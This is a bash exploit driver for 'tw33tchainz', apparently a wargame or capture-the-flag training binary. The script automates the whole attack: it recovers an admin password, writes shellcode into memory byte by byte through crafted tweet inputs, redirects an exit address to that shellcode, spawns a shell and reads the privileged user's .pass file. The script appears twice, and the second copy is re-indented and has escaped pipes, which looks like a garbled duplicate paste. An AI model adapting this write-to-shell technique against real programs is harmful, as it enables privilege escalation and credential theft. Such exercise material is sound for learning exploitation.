Bash driver to exploit tw33tchainz

## driver.sh
input_file="inputs"
debug_file="debug"

# nuke that shit
rm $input_file
rm $debug_file
touch $input_file
touch $debug_file

binary="/levels/project1/tw33tchainz"
shellCode="/tmp/bleached/project1/binsh.hex"
# in bytes "" <- hand quotes
shellCodeSize=$(cat $shellCode | wc -w)
stepsSinceExit=999

# program state constants
programState=0
numTweets=0
WAIT=999
GET_PASS=1000
GET_ADMIN=1001
WRITE_SHELL=1002
WRITE_EXIT=1003

writeAddr="0x0804c0c1"
exitAddr="0x0804c038"
writeAddrValues=$(echo $writeAddr | perl -pe "s/..(..)(..)(..)(..)/\4 \3 \2 \1/")

input() {
    printf "$1" "$2" >> $input_file
    printf "$1" "$2" >> debug
}

tail -f $input_file | $binary | while read output
do
    # filter the asni colors and clears
    output="$(echo "$output" | sed "s,\x1B\[[0-9;]*[a-zA-Z],,g")"
    echo "$output"

    case "$programState" in
        $GET_PASS)
            genpass="$output"
            password="$(python decode_pass.py $genpass)"
            programState=$GET_ADMIN
        ;;
        $GET_ADMIN)
            if [ "$stepsSinceExit" == "1" ]
            then
                input "3\n"
                input "%s\n" "$password"
                programState=$WRITE_SHELL
            fi
        ;;
        $WRITE_SHELL)
            # Since we're admin now it's 2 steps away
            if [ "$stepsSinceExit" == "2" ]
            then
                input "1\n"
                hexVal=$(cat $shellCode | cut -d' ' -f$(($numTweets+1)))
                tweet=$(python get_tweet.py $writeAddr $numTweets $hexVal)
                tsize=$(echo $tweet | wc -c)
                input "%s\n" "$tweet"
                numTweets=$(($numTweets+1))

                if [ ! $numTweets -lt $shellCodeSize ]
                then
                    programState=$WRITE_EXIT
                    numTweets=0
                fi
            fi
        ;;
        $WRITE_EXIT)
            if [ "$stepsSinceExit" == "2" ]
            then
                input "1\n"
                hexVal=$(echo $writeAddrValues | cut -d' ' -f$(($numTweets+1)))
                tweet=$(python get_tweet.py $exitAddr $numTweets $hexVal)
                input "%s\n" "$tweet"
                numTweets=$(($numTweets+1))

                if [ ! $numTweets -lt 4 ]
                then
                    programState=$EXIT
                    numTweets=0
                fi
            fi
        ;;
        $EXIT)
            if [ "$stepsSinceExit" == "2" ]
            then
                input "5\n"
                # wait for the shell to fire up
                sleep 1
                input "cat /home/project1_priv/.pass\n"
                programState=$WAIT
            fi
        ;;
        *)
            #Do nothing
        ;;
    esac

    case "$output" in
        "Enter Username:")
            input "%s" "$(python -c "print '\x01'*15")"
        ;;
        "Enter Salt:")
            input "%s" "$(python -c "print '\xff'*15")"
        ;;
        "Generated Password:")
            programState=$GET_PASS
            input "\n"
        ;;
        "5: Exit"*)
            stepsSinceExit=0
        ;;
        *)
            #Do nothing
        ;;
    esac

    stepsSinceExit=$(($stepsSinceExit + 1))
done
	input_file="inputs"
	debug_file="debug"

	# nuke that shit
	rm $input_file
	rm $debug_file
	touch $input_file
	touch $debug_file

	binary="/levels/project1/tw33tchainz"
	shellCode="/tmp/bleached/project1/binsh.hex"
	# in bytes "" <- hand quotes
	shellCodeSize=$(cat $shellCode \| wc -w)
	stepsSinceExit=999

	# program state constants
	programState=0
	numTweets=0
	WAIT=999
	GET_PASS=1000
	GET_ADMIN=1001
	WRITE_SHELL=1002
	WRITE_EXIT=1003

	writeAddr="0x0804c0c1"
	exitAddr="0x0804c038"
	writeAddrValues=$(echo $writeAddr \| perl -pe "s/..(..)(..)(..)(..)/\4 \3 \2 \1/")

	input() {
	printf "$1" "$2" >> $input_file
	printf "$1" "$2" >> debug
	}

	tail -f $input_file \| $binary \| while read output
	do
	# filter the asni colors and clears
	output="$(echo "$output" \| sed "s,\x1B\[[0-9;]*[a-zA-Z],,g")"
	echo "$output"

	case "$programState" in
	$GET_PASS)
	genpass="$output"
	password="$(python decode_pass.py $genpass)"
	programState=$GET_ADMIN
	;;
	$GET_ADMIN)
	if [ "$stepsSinceExit" == "1" ]
	then
	input "3\n"
	input "%s\n" "$password"
	programState=$WRITE_SHELL
	fi
	;;
	$WRITE_SHELL)
	# Since we're admin now it's 2 steps away
	if [ "$stepsSinceExit" == "2" ]
	then
	input "1\n"
	hexVal=$(cat $shellCode \| cut -d' ' -f$(($numTweets+1)))
	tweet=$(python get_tweet.py $writeAddr $numTweets $hexVal)
	tsize=$(echo $tweet \| wc -c)
	input "%s\n" "$tweet"
	numTweets=$(($numTweets+1))

	if [ ! $numTweets -lt $shellCodeSize ]
	then
	programState=$WRITE_EXIT
	numTweets=0
	fi
	fi
	;;
	$WRITE_EXIT)
	if [ "$stepsSinceExit" == "2" ]
	then
	input "1\n"
	hexVal=$(echo $writeAddrValues \| cut -d' ' -f$(($numTweets+1)))
	tweet=$(python get_tweet.py $exitAddr $numTweets $hexVal)
	input "%s\n" "$tweet"
	numTweets=$(($numTweets+1))

	if [ ! $numTweets -lt 4 ]
	then
	programState=$EXIT
	numTweets=0
	fi
	fi
	;;
	$EXIT)
	if [ "$stepsSinceExit" == "2" ]
	then
	input "5\n"
	# wait for the shell to fire up
	sleep 1
	input "cat /home/project1_priv/.pass\n"
	programState=$WAIT
	fi
	;;
	*)
	#Do nothing
	;;
	esac

	case "$output" in
	"Enter Username:")
	input "%s" "$(python -c "print '\x01'*15")"
	;;
	"Enter Salt:")
	input "%s" "$(python -c "print '\xff'*15")"
	;;
	"Generated Password:")
	programState=$GET_PASS
	input "\n"
	;;
	"5: Exit"*)
	stepsSinceExit=0
	;;
	*)
	#Do nothing
	;;
	esac

	stepsSinceExit=$(($stepsSinceExit + 1))
	done